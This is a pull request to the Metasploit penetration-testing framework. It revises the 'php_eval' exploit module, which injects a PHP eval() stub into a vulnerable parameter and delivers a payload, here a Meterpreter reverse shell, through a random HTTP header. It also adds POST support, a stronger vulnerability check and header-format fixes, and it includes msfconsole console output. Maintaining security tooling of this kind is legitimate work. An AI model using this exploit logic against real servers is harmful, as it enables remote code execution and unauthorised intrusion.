### PR TITLE
php_eval: Improve check, fix exploit, add POST support & more verbose

### DIFF
--- a/modules/exploits/multi/http/os_cmd_exec.rb
+++ b/modules/exploits/multi/http/os_cmd_exec.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('POSTDATA', [false, 'POST data to send, with the command injection placeholder set to !INJECT!. Otherwise, a GET request will be used.']),
         OptString.new('URIPATH', [true, 'The URI to request, with the command injection placeholder set to !INJECT!.', '/ping/?cmd=!INJECT!']),
-        OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"'])
+        OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header=value,header2=value2"'])
       ]
     )
   end
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       headers.split(',').each do |header|
         next if header.nil? || header.empty?
 
-        key, value = header.split(':', 2)
+        key, value = header.split('=', 2)
         next if key.nil? || value.nil?
 
         key = key.strip

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    uri = datastore['PHPURI'].gsub(/\?.*/, '')
+    uri = datastore['URIPATH'].gsub(/\?.*/, '')
     print_status("Checking uri #{uri}")
     response = send_request_raw({ 'uri' => uri })
     if response.code == 200

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
+        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?evalme=!INJECT!']),
         OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"'])
       ]
     )
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     headername = 'X-' + Rex::Text.rand_text_alpha_upper(rand(10..19))
     stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub('-', '_')}]);"
 
-    uri = datastore['URIPATH'].sub('!CODE!', Rex::Text.uri_encode(stub))
+    uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(stub))
     print_status("Sending request for: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}")
     print_status("Payload will be in a header called #{headername}")
 

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Generic PHP Code Evaluation',
         'Description' => %q{
           This module can be used to exploits things like:
-          <?php eval($_REQUEST['evalme']); ?>
+          <?php eval($_REQUEST['eval']); ?>
           The payload will be delivered in a header.
           It is likely that HTTP evasion options will break this exploit.
         },
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('FORMDATA', [ false, "POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request." ]),
-        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?evalme=!INJECT!' ]),
+        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?eval=!INJECT!' ]),
         OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"' ])
       ]
     )

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -51,6 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptString.new('FORMDATA', [ false, "POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request." ]),
         OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?evalme=!INJECT!']),
         OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"'])
       ]
@@ -58,10 +59,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    method = datastore['FORMDATA'] ? "POST" : "GET"
     uri = datastore['URIPATH'].gsub(/\?.*/, '')
-    print_status("Checking uri #{uri}")
+    print_status("Checking URI via #{method}: #{uri}")
     response = send_request_raw({
       'uri' => uri,
+      'method' => method,
       'headers' => datastore_headers.merge(
         'Connection' => 'close'
       )
@@ -94,25 +97,38 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # very short timeout because the request may never return if we're
-    # sending a socket payload
-    timeout = 0.01
+    method = datastore['FORMDATA'] ? 'POST' : 'GET'
 
     headername = 'X-' + Rex::Text.rand_text_alpha_upper(rand(10..19))
+    print_status("Payload header: #{headername}")
+
     stub = 'error_reporting(0);eval($_SERVER["HTTP_' + headername.gsub('-', '_') + '"]);'
-
     uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(stub))
-    print_status("Sending request for: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}")
-    print_status("Payload will be in a header called #{headername}")
+    data = method.casecmp?('get') ? nil : datastore['FORMDATA'].sub('!INJECT!', stub)
+    feedback_text = "Sending #{method} request: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}"
+    feedback_text << " -> #{data}" unless method.casecmp?('get')
+    print_status(feedback_text)
 
-    response = send_request_raw({
-      'global' => true,
-      'uri' => uri,
+    req = {
+      'global'  => true,
+      'uri'     => uri,
+      'method'  => method,
       'headers' => datastore_headers.merge(
         headername => payload.encoded,
         'Connection' => 'close'
       )
-    }, timeout)
+    }
+    unless method.casecmp?('get')
+      req['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
+      req['headers']['Content-Length'] = data.length
+      req['data'] = data
+    end
+
+    # very short timeout because the request may never return if we're
+    # sending a socket payload
+    timeout = 0.01
+
+    response = send_request_raw(req, timeout)
     if response && (response.code != 200)
       print_error("Server returned non-200 status code (#{response.code})")
     end

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -14,7 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Generic PHP Code Evaluation',
         'Description' => %q{
-          Exploits things like <?php eval($_REQUEST['evalme']); ?>
+          This module can be used to exploits things like:
+          <?php eval($_REQUEST['evalme']); ?>
+          The payload will be delivered in a header.
           It is likely that HTTP evasion options will break this exploit.
         },
         'Author' => [ 'egypt' ],
@@ -72,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown unless response
     return Exploit::CheckCode::Detected if response.code == 200
 
-    vprint_error("Server responded with #{response.code}")
+    vprint_error("Server responded with: HTTP #{response.code}")
     return Exploit::CheckCode::Safe
   end
 
@@ -101,6 +103,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     headername = 'X-' + Rex::Text.rand_text_alpha_upper(rand(10..19))
     print_status("Payload header: #{headername}")
+    vprint_status("Payload via header: #{payload.encoded}")
+    vprint_status("PHP code via #{datastore['HTTP_METHOD']}: #{stub}")
 
     stub = 'error_reporting(0);eval($_SERVER["HTTP_' + headername.gsub('-', '_') + '"]);'
     uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(stub))
@@ -129,8 +133,11 @@ class MetasploitModule < Msf::Exploit::Remote
     timeout = 0.01
 
     response = send_request_raw(req, timeout)
-    if response && (response.code != 200)
-      print_error("Server returned non-200 status code (#{response.code})")
+    # Due to short timeout, may take longer to get a response/shell/session, so not a big deal if this fails
+    if response.nil?
+      vprint_warning("The request received no response in the allotted time, and is expected, even if the exploit succeeds.")
+    elsif response.code != 200
+      vprint_error("Error with payload request (HTTP #{response.code}, should be 200)")
     end
 
     handler

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -61,9 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = datastore['URIPATH'].gsub(/\?.*/, '')
     print_status("Checking uri #{uri}")
     response = send_request_raw({ 'uri' => uri })
-    if response.code == 200
-      return Exploit::CheckCode::Detected
-    end
+    return Exploit::CheckCode::Unknown unless response
+    return Exploit::CheckCode::Detected if response.code == 200
 
     vprint_error("Server responded with #{response.code}")
     return Exploit::CheckCode::Safe

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -60,7 +60,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     uri = datastore['URIPATH'].gsub(/\?.*/, '')
     print_status("Checking uri #{uri}")
-    response = send_request_raw({ 'uri' => uri })
+    response = send_request_raw({
+      'uri' => uri,
+      'headers' => datastore_headers.merge(
+        'Connection' => 'close'
+      )
+    })
     return Exploit::CheckCode::Unknown unless response
     return Exploit::CheckCode::Detected if response.code == 200
 

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -64,20 +64,33 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     method = datastore['FORMDATA'] ? 'POST' : 'GET'
-    uri = datastore['URIPATH'].gsub(/\?.*/, '')
+    payload1 = rand_text_alphanumeric(rand(8..15))
+    payload2 = rand_text_alphanumeric(rand(8..15))
+    stub = "error_reporting(0);echo '#{payload1}'.'#{payload2}';"
+    uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(stub))
     print_status("Checking URI via #{method}: #{uri}")
-    response = send_request_raw({
+    response = {
+      'global' => true,
       'uri' => uri,
       'method' => method,
       'headers' => datastore_headers.merge(
         'Connection' => 'close'
       )
-    })
+    }
+    unless method.casecmp?('get')
+      data = datastore['FORMDATA'].sub('!INJECT!', stub)
+      response['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
+      response['headers']['Content-Length'] = data.length
+      response['data'] = data
+    end
+    response = send_request_raw(response)
+
     return Exploit::CheckCode::Unknown unless response
+    return Exploit::CheckCode::Vulnerable if response.body.match(payload1 + payload2)
     return Exploit::CheckCode::Detected if response.code == 200
 
-    vprint_error("Server responded with: HTTP #{response.code}")
-    return Exploit::CheckCode::Safe
+    vprint_warning("Server responded with: HTTP #{response.code}")
+    return Exploit::CheckCode::Unknown
   end
 
   def datastore_headers

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('FORMDATA', [ false, "POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request." ]),
         OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?eval=!INJECT!' ]),
-        OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"' ])
+        OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header=value,header2=value2"' ])
       ]
     )
   end
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
       headers.split(',').each do |header|
         next if header.nil? || header.empty?
 
-        key, value = header.split(':', 2)
+        key, value = header.split('=', 2)
         next if key.nil? || value.nil?
 
         key = key.strip

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     timeout = 0.01
 
     headername = 'X-' + Rex::Text.rand_text_alpha_upper(rand(10..19))
-    stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub('-', '_')}]);"
+    stub = 'error_reporting(0);eval($_SERVER["HTTP_' + headername.gsub('-', '_') + '"]);'
 
     uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(stub))
     print_status("Sending request for: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}")

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           # http://www.boutell.com/newfaq/misc/urllength.html
           # 'Space'       => 4000,
           'DisableNops' => true,
-          'BadChars' => %q{'"`}, # quotes are escaped by PHP's magic_quotes_gpc in a default install
+          'BadChars' => '\r', # If using ' ' or '\n', causes issues when using payload/generic/custom's PAYLOADSTR
           'Compat' =>
                         {
                           'ConnectionType' => 'find'

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -19,29 +19,31 @@ class MetasploitModule < Msf::Exploit::Remote
           The payload will be delivered in a header.
           It is likely that HTTP evasion options will break this exploit.
         },
-        'Author' => [ 'egypt' ],
+        'Author' => [
+          'egypt',
+          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+        ],
         'License' => BSD_LICENSE,
         'References' => [ ],
         'Privileged' => false,
-        'Platform' => ['php'],
+        'Platform' => [ 'php' ],
         'Arch' => ARCH_PHP,
         'Payload' => {
-          # max header length for Apache,
+          # Max header length for Apache,
           # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
-          'Space' => 8190,
-          # max url length for some old versions of apache according to
+          # However, 4000 max url length for some old versions of apache according to
           # http://www.boutell.com/newfaq/misc/urllength.html
-          # 'Space'       => 4000,
+          'Space' => 8190,
           'DisableNops' => true,
           'BadChars' => '\r', # If using ' ' or '\n', causes issues when using payload/generic/custom's PAYLOADSTR
           'Compat' =>
                         {
                           'ConnectionType' => 'find'
                         },
-          'Keys' => ['php']
+          'Keys' => [ 'php' ]
         },
         'DisclosureDate' => '2008-10-13',
-        'Targets' => [ ['Automatic', {}], ],
+        'Targets' => [ [ 'Automatic', {} ], ],
         'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
@@ -54,14 +56,14 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('FORMDATA', [ false, "POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request." ]),
-        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?evalme=!INJECT!']),
-        OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"'])
+        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !INJECT!", '/test.php?evalme=!INJECT!' ]),
+        OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"' ])
       ]
     )
   end
 
   def check
-    method = datastore['FORMDATA'] ? "POST" : "GET"
+    method = datastore['FORMDATA'] ? 'POST' : 'GET'
     uri = datastore['URIPATH'].gsub(/\?.*/, '')
     print_status("Checking URI via #{method}: #{uri}")
     response = send_request_raw({
@@ -100,46 +102,40 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     method = datastore['FORMDATA'] ? 'POST' : 'GET'
-
     headername = 'X-' + Rex::Text.rand_text_alpha_upper(rand(10..19))
-    print_status("Payload header: #{headername}")
-    vprint_status("Payload via header: #{payload.encoded}")
-    vprint_status("PHP code via #{datastore['HTTP_METHOD']}: #{stub}")
-
     stub = 'error_reporting(0);eval($_SERVER["HTTP_' + headername.gsub('-', '_') + '"]);'
+    vprint_status("PHP code via #{method} using #{headername} header: #{stub}")
     uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(stub))
-    data = method.casecmp?('get') ? nil : datastore['FORMDATA'].sub('!INJECT!', stub)
-    feedback_text = "Sending #{method} request: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}"
+    feedback_text = "Sending #{method} request: http#{ssl ? 's' : ''}://#{Rex::Socket.to_authority(rhost, rport)}#{uri}"
     feedback_text << " -> #{data}" unless method.casecmp?('get')
     print_status(feedback_text)
 
-    req = {
-      'global'  => true,
-      'uri'     => uri,
-      'method'  => method,
+    response = {
+      'global' => true,
+      'uri' => uri,
+      'method' => method,
       'headers' => datastore_headers.merge(
         headername => payload.encoded,
         'Connection' => 'close'
       )
     }
     unless method.casecmp?('get')
-      req['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
-      req['headers']['Content-Length'] = data.length
-      req['data'] = data
+      data = datastore['FORMDATA'].sub('!INJECT!', stub)
+      response['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
+      response['headers']['Content-Length'] = data.length
+      response['data'] = data
     end
 
     # very short timeout because the request may never return if we're
     # sending a socket payload
-    timeout = 0.01
+    timeout = 0
 
-    response = send_request_raw(req, timeout)
+    response = send_request_raw(response, timeout)
     # Due to short timeout, may take longer to get a response/shell/session, so not a big deal if this fails
     if response.nil?
-      vprint_warning("The request received no response in the allotted time, and is expected, even if the exploit succeeds.")
+      vprint_warning('The request received no response in the allotted time, and is expected, even if the exploit succeeds.')
     elsif response.code != 200
       vprint_error("Error with payload request (HTTP #{response.code}, should be 200)")
     end
-
-    handler
   end
 end

--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('ROOTDIR', [ true, 'The base directory to prepend to PHPURIs', '/' ]),
         OptString.new('PHPURI', [ false, "The URI to request, with the include()'d parameter changed to !INJECT!", 'test.php?inc=!INJECT!' ]),
         OptString.new('FORMDATA', [ false, "POST data to send, with the include()'d parameter changed to !INJECT!. Otherwise will be a GET request." ]),
-        OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"' ]),
+        OptString.new('HEADERS', [ false, 'Any additional HTTP headers to send, cookies for example. Format: "header=value,header2=value2"' ]),
         OptPath.new('PHPRFIDB',
                     [
                       false,
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
       headers.split(',').each do |header|
         next if header.nil? || header.empty?
 
-        key, value = header.split(':', 2)
+        key, value = header.split('=', 2)
         next if key.nil? || value.nil?
 
         key = key.strip


### PR DESCRIPTION
Think this is a typo!

- - - 

**Error**:

```console
$ msfconsole -q -x ' set VERBOSE true; use exploit/unix/webapp/php_eval; set RHOSTS 127.0.0.1;'
VERBOSE => true
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
RHOSTS => 127.0.0.1
msf exploit(unix/webapp/php_eval) > options

Module options (exploit/unix/webapp/php_eval):

   Name     Current Setting          Required  Description
   ----     ---------------          --------  -----------
   HEADERS                           no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   127.0.0.1                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80                       yes       The target port (TCP)
   SSL      false                    no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /test.php?evalme=!CODE!  yes       The URI to request, with the eval()'d parameter changed to !CODE!
   VHOST                             no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.30.30    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(unix/webapp/php_eval) > check
[-] Exploit failed: NoMethodError undefined method `gsub' for nil
[-] 127.0.0.1:80 - Check failed: The state could not be determined.
msf exploit(unix/webapp/php_eval) >
```

- - -

Looking at the code:

```console
$ grep -i 'def check' -A 3 /usr/share/metasploit-framework/modules/exploits/unix/webapp/php_eval.rb
  def check
    uri = datastore['PHPURI'].gsub(/\?.*/, "")
    print_status("Checking uri #{uri}")
    response = send_request_raw({ 'uri' => uri })
$
$ grep -i 'PHPURI' /usr/share/metasploit-framework/modules/exploits/unix/webapp/php_eval.rb
    uri = datastore['PHPURI'].gsub(/\?.*/, "")
$
$ grep -i URIPATH /usr/share/metasploit-framework/modules/exploits/unix/webapp/php_eval.rb
        OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
    uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
$
```